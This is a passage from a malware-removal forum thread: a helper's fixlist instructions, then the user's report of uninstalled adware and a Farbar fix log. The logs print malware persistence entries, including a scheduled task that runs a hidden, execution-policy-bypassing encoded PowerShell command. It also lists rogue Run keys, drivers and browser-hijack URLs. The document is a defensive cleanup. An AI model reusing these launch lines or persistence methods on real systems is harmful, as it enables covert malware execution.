2014-12-01 12:43 - 2014-12-01 12:43 - 0000854 _____ () C:\Users\Robert G\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\9483d08e-1f72-4d13-b956-5e490aa0f581.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000278 _____ () C:\Users\Robert G\AppData\Local\b62f5060-8250-438a-a930-35c70e952a02.dat
2016-12-27 12:51 - 2016-12-27 12:51 - 0010752 _____ () C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-27 13:07 - 2016-12-27 13:10 - 0100352 _____ () C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 0002560 _____ () C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 0439808 _____ () C:\ProgramData\smp2.exe
C:\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\9S1ETRV3OH.exe
C:\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\sdf6733.exe
C:\Users\Robert G\AppData\Local\Temp\W66KQ7BR7K.exe
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Citrix\GoToMeeting\1468\G2MOutlookAddin64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
Task: {0A6D162B-2271-438A-9015-FDF86E38E3A1} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {0B0C6F63-0BD1-498A-9527-397F7F32D262} - System32\Tasks\gak73699857k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {11643EA6-43A5-4B26-BCA2-B79C17E2627D} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {136AC49D-1185-4DAF-9EED-4010A2D37876} - System32\Tasks\src_srv => C:\Users\Robert G\AppData\Roaming\src_srv\tsktst.exe [2016-12-26] ()
C:\Program Files (x86)\knockdowns
Task: {1990B26F-6ADF-4BD8-BA6F-799C43204F26} - System32\Tasks\18170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {1CCBFDDC-4FED-4859-9EA1-176E35894E0A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {1E7810AB-4461-4BAB-A923-725FF0121E8B} - System32\Tasks\73699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {20A9A40C-98B8-4A9E-9EF4-34A0EB5D2C67} - System32\Tasks\Update Service for Youtube AdBlock => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {335F0AFA-8CF9-409A-931C-B15A49778819} - System32\Tasks\Update Service for Youtube AdBlock2 => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {4E463819-FB04-48C1-ACDA-F4F4D23C5466} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A} - System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {5C8969CF-AF98-4F0F-A7DD-B1B9C5CC10B2} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== ATTENTION
Task: {5D326864-1C1B-4B0C-98E4-8975183EBD11} - \WPD\SqmUpload_S-1-5-21-3079306625-983104223-3348847558-1001 -> No File <==== ATTENTION
Task: {69CE572E-9923-4159-A330-DB1D3C2631A8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565} - System32\Tasks\60353394 => C:\Program Files (x86)\Ovals\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {7115A4DA-439D-4050-9AEF-FD2E2E5A752E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {7B8662A0-9355-4D8A-8BFD-BEAF35343CD1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {85384654-A986-4FB7-A8DA-D7761EDA3149} - System32\Tasks\k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {965C4FE9-DA8F-4232-8D6F-D709676DEF24} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {99C8DB32-949A-499C-B5D9-6042D048950D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {9FFCB734-D79F-4764-8B63-4F06330E3F45} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATTENTION
Task: {A06CEAA3-C663-4DD1-BE93-23D8A41E521F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {A18C8BED-9923-4C65-B78D-B7C168B06955} - System32\Tasks\ga1817011518170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] ()
Task: {A9528279-474A-4DBA-B459-B825FF0C055E} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {AA44AE25-68B3-45C6-B7D1-06333F50237C} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-12-27] () <==== ATTENTION
Task: {AB85B611-7F3D-4A11-A7EA-5DAC9B9FCCEC} - System32\Tasks\AGProxyCheck => C:\Program [Argument = Files (x86)\AnonymizerGadget\AGService.exe /recove]
Task: {ADD99CD3-D8CD-40A8-935C-68C869A6BCB2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75} - System32\Tasks\ga7369985773699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] ()
Task: {B7270AB1-E0AB-41E2-971C-27831D9730D2} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ATTENTION
Task: {C3BB1E32-5428-4562-8D07-A171B852CB9C} - System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwA7ADsAIAAgACAAOwAgADsAIAA7ADsAIAA7ACAAOwAgADsAIAAgACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (the data entry has 10148 more characters). <==== ATTENTION
Task: {FD468177-984E-4514-B2CE-7B86E83EF36F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,"
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files (x86)\Google\Chrome\application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
C:\WINDOWS\TEMP\Jxwh7jTdDh8tytSaP
AlternateDataStreams: C:\ProgramData\Temp:972E3A44 [272]
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\.exe: exefile => "%1" %* <===== ATTENTION
FirewallRules: [{0CFEF3A1-D62E-4242-BA17-47AFEC0E9CFE}] => C:\Program Files (x86)\Ovals\fluctuations.exe
FirewallRules: [{CE917A65-979C-4094-9A27-546C03A0F0B4}] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe
FirewallRules: [{70CB83FD-6AD0-4679-BD8F-A7D29BD02E90}]
FirewallRules: [{4ABBB1A8-3F3A-42F2-AFD1-8A812FD3A3E2}]
hosts:
emptytemp:
  • Right click on FRST.exe, select Run as administrator then press the Fix button
  • When completed, the tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.

===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.

  • Programs uninstall?
  • Fixlog
  • Update on computer performance

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#4 billiam864

billiam864
  • Topic Starter

  • Members
  • 71 posts

Posted 28 December 2016 - 11:24 AM

Hello, and Thank you!

 

I used Revo Uninstaller to eliminate the following as guided:

  • AnonymizerGadget
  • AnySend
  • BestCleaner version 1.0
  • Body Text Feathering
  • CleanBrowser
  • EZSearch
  • GeekBuddy
  • KNCTR
  • MyBeeSearchService
  • NowUSeeIt Player (Were loads of Bold files in many different registries).
  • One System Care
  • ProxyGate version 3.0.0.1176
  • REOptimizer
  • Search module
  • shopperz
  • Social2Search
  • System Healer
  • Unfugitive Archhypocrite Asonia
  • Youtube AdBlock

I did not find listed the below:

  • BandwidthStat
  • Itibiti RTC

 

After then running the Fix shown below, my cpu is much improved. I appear to be able to use Chrome again normally without the random webpages or pop-ups, and no more other install attempts on screen. Previously I couldn't even access a website, and could barely get to the control panel, so this is much improved. I would say the speed is still a bit slower than previous, but tough to say for sure.

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 21-12-2016
Ran by Robert G (28-12-2016 10:10:50) Run:1
Running from G:\
Loaded Profiles: Robert G (Available Profiles: Robert G)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Users\Robert G\AppData\Roaming\src_srv
C:\Program Files\AE5AV44CD6
C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
C:\Program Files (x86)\mem
C:\Program Files (x86)\BestCleaner
C:\Program Files\1OZOH9DOKF
C:\Program Files\0DA5GV0SMZ
C:\Program Files (x86)\Unfugitivepocson
C:\Program Files (x86)\Ovals
C:\Program Files (x86)\NowUSeeItPlayer
C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe
C:\Program Files\Common Files\Noobzo
C:\Program Files\Jidd
C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
C:\Users\Robert G\AppData\Roaming\Xeeedxi
C:\Users\Robert G\AppData\Roaming\Interstatnogui
C:\Windows\Temp\nst9E9E.tmp
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Program Files (x86)\Unfugitivepocson
HKLM\...\Run: [group] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM\...\Run: [groupgroup] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [AnonymizerGadget] => "C:\Users\Robert G\AppData\Roaming\AGData\bin$\AnonymizerLauncher.exe" /S /startup --ppapi-flash-path=./pepflashplayer.dll /source:1665 /subsource:200088693 <===== ATTENTION
C:\Users\Robert G\AppData\Roaming\AGData
HKLM-x32\...\Run: [src_srv] => C:\Users\Robert G\AppData\Roaming\src_srv\strttst.exe [16464 2016-12-26] ()
HKLM-x32\...\Run: [ayling] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [aylingayling] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [BestCleaner] => C:\Program Files (x86)\BestCleaner\BestCleaner.exe [180736 2016-09-16] () <===== ATTENTION
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_FD7I7] => C:\Program Files (x86)\BestCleaner\6URRPC.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_4SCPB] => C:\Program Files (x86)\BestCleaner\RLLZNZ.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\Policies\Explorer: [NoViewOnDrive] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\...\Policies\Explorer: [NoViewContextMenu] 0
HKLM\...\Policies\Explorer: [NoShellSearchButton] 0
HKLM\...\Policies\Explorer: [NoFind] 0
HKLM\...\Policies\Explorer: [NoFile] 0
HKLM\...\Policies\Explorer: [HideClock] 0
HKLM\...\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\...\Policies\Explorer: [NoSetFolders] 0
HKLM\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\...\Policies\Explorer: [NoSetTaskbar] 0
HKLM\...\Policies\Explorer: [NoDeletePrinter] 0
HKLM\...\Policies\Explorer: [NoDFSTab] 0
HKLM\...\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\...\Policies\Explorer: [NoLogoff] 0
HKLM\...\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\...\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 0
HKLM\...\Policies\Explorer: [NoSaveSettings] 0
HKLM\...\Policies\Explorer: [NoHardwareTab] 0
HKLM\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\...\Policies\Explorer: [NoDesktop] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabaly] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabalyprobabaly] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formally] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formallyformally] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [7E2GIGOFIW] => C:\Program Files\AE5AV44CD6\AE5AV44CD.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [kelling] => C:\Program Files (x86)\mem\kelling.exe [68835 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [const] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [ProxyGate] => C:\Users\Robert G\AppData\Roaming\ProxyGate\MainService.exe [1142880 2016-01-10] (Gold Click Ltd) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [DP53A0YCAS] => C:\Program Files\1OZOH9DOKF\8RNAHD98E.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [slisdo] => rundll32.exe "C:\Users\Robert G\AppData\Local\slisdo.dll",slisdo <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [8SI36M2PFP] => C:\Program Files\0DA5GV0SMZ\0DA5GV0SM.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [YPCXU7XLWZ] => C:\Program Files (x86)\BestCleaner\ZES6LOELP3.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Q4M50GL1YU] => C:\Program Files (x86)\BestCleaner\A3TLSPE275.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Interstatnogui] => C:\Users\Robert G\AppData\Roaming\Interstatnogui\interstatnogui.exe [2757568 2016-12-27] (Global surveys) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoStartMenuSubFolders] 0
Startup: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\misprision.lnk [2016-12-27]
ShortcutTarget: misprision.lnk -> C:\Program Files (x86)\Ovals\fluctuations.exe ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ie
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> DefaultScope {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {B2155548-F7E4-4313-ACE1-89C26E550F10} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
BHO: Jidd -> {9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} -> C:\Program Files\Jidd\Rorfeql64.dll [2016-12-27] ()
BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch"
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
R2 66d2d577efd779c3e9f6f6c2faf74956; C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe [5556736 2016-12-16] () [File not signed] <==== ATTENTION
R2 Cegoe; C:\Users\Robert G\AppData\Roaming\Xeeedxi\Xeeedxi.exe [170496 2016-12-04] () [File not signed]
R2 Ilaaugca; C:\Users\Robert G\AppData\Roaming\JucdiJhnoz\Rawei.exe [121344 2016-12-04] () [File not signed]
R2 KarxMhfonki; C:\Program Files\Jidd\KarxMhfonki.exe [1684992 2016-12-27] () [File not signed]
R2 srcsrv; C:\Users\Robert G\AppData\Roaming\src_srv\winsrcsrv.exe [13904 2016-12-26] ()
R2 UnfugitiveA; C:\Program Files (x86)\Unfugitivepocson\UnfugitiveA.exe [132096 2016-12-16] (Renascence Inc.) [File not signed]
R2 WindowService; C:\Users\Robert G\AppData\Local\Temp\WS\WindowService.exe [8192 2016-12-25] () [File not signed]
c:\exervice.exe
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
R2 meseboje; C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\knsg851A.tmpfs [X]
R1 979804fd5c15500d838ae68596384f64; C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys [95040 2016-12-16] (97V68D) <==== ATTENTION
R1 cherimoya; C:\WINDOWS\System32\drivers\cherimoya.sys [65440 2016-12-27] (Windows ® Win 7 DDK provider) <==== ATTENTION
C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys
C:\WINDOWS\System32\drivers\cherimoya.sys
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2016-12-26] ()
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482845765-9D97-579A-C454442718AE
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Program Files\Jidd
